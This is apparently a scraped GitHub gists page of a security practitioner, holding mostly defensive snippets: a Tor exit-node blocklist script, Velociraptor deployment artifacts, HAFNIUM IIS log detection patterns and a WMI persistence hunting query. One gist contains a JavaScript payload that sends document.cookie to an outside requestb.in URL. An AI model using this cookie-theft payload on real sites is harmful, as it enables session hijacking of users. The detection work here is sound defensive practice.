I hereby claim:
- I am ecapuano on github.
- I am ecapuano (https://keybase.io/ecapuano) on keybase.
- I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B
To claim this, I am signing this object:
Eric Capuano ecapuano
ecapuano
/ getTORnodes.sh
Created
August 25, 2015 17:44
Simple script for getting the latest list of TOR exit nodes and outputting them into a blocklist format, 1 exit node per line. Easily used as Dynamic Blocklist on Palo Alto Firewalls.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good. | |
| # Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc... | |
| # | |
| curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt |
ecapuano
/ keybase.md
Created
November 18, 2015 22:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:var img = document.createElement('img'); | |
| img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # character set to use for generating passwords | |
| chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$% | |
| # how many passwords to generate | |
| count=100 | |
| n=0 | |
| while [ $n -le $count ] ; do | |
| for i in {1..12} ; do #### 12 defines the max size of the passwords |
ecapuano
/ winlogontypes.csv
Created
June 11, 2018 23:59
Lookup CSV for WinLogBeat decorations in Graylog
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id | description | |
|---|---|---|
| 2 | Interactive (logon at keyboard and screen of system) | |
| 3 | Network (i.e. connection to shared folder on this computer from elsewhere on network) | |
| 4 | Batch (i.e. scheduled task) | |
| 5 | Service (Service startup) | |
| 7 | Unlock (i.e. unlocking unnattended workstation) | |
| 8 | NetworkCleartext (Logon with credentials sent in the clear text.) | |
| 9 | NewCredentials such as with RunAs or mapping a network drive with alternate credentials. | |
| 10 | RemoteInteractive (Terminal Services Remote Desktop or Remote Assistance) | |
| 11 | CachedInteractive (logon with cached domain credentials) |
ecapuano
/ Custom.CapsSysmon.Deploy.xml
Created
June 27, 2020 14:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Custom.CapsSysmon.Deploy | |
| description: | | |
| A quick and dirty way to download and install sysmon via Velociraptor | |
| # Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
| type: CLIENT | |
| parameters: | |
| - name: sysmonURL | |
| default: http://url.to/sysmon8_64.exe | |
| - name: binPath | |
| default: C:\sysmon.exe |
ecapuano
/ Custom.Winlogbeat.Deploy.xml
Last active
December 19, 2023 20:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Custom.Winlogbeat.Deploy | |
| description: | | |
| Quick and dirty way to deploy Winlogbeat via Velociraptor | |
| # Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT | |
| type: CLIENT | |
| parameters: | |
| - name: binaryURL | |
| default: http://url.to/winlogbeat.exe | |
| - name: installPath | |
| default: C:\Program Files\winlogbeat |
ecapuano
/ Eradication.ps1
Created
June 27, 2020 14:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A script that will safely remove adversary footholds on systems. | |
| # | |
| # Be sure to replace your observables down below. Be careful not to | |
| # included LOLBINs as they cannot be safely killed this way. Use | |
| # Kill-Threads.ps1 for those. | |
| # | |
| # Used with great success during CF20 | |
| # | |
| # Author: Eric Capuano |
ecapuano
/ gist:13386852fb80beac4561f2bed569095e
Created
March 7, 2021 04:00
HAFNIUM IIS Log Search Patterns
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs... | |
| # Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1 | |
| # | |
| # https://twitter.com/eric_capuano | |
| # Quick check for likely successful attacks | |
| ## Bash (faster) | |
| egrep -i '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log | |
| ## PowerShell | |
| Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log |
ecapuano
/ wmi_event_consumer_stacking.txt
Last active
May 26, 2022 01:42
wmi_event_consumer_stacking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // run against results from Windows.Persistence.PermanentWMIEvents | |
| // https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml | |
| SELECT ConsumerDetails.Name AS ConsumerName, ConsumerDetails.CommandLineTemplate AS CommandLineTemplate, FilterDetails.Name AS FilterName, FilterDetails.Query AS FilterQuery, count() AS Count FROM source() | |
| // filter common FPs | |
| WHERE ConsumerName != "BVTConsumer" | |
| AND ConsumerName != "SCM Event Log Consumer" | |
| AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer" | |
| AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer" | |
| AND ConsumerName != "CmdLineConsumer_WSCEAA" |
OlderNewer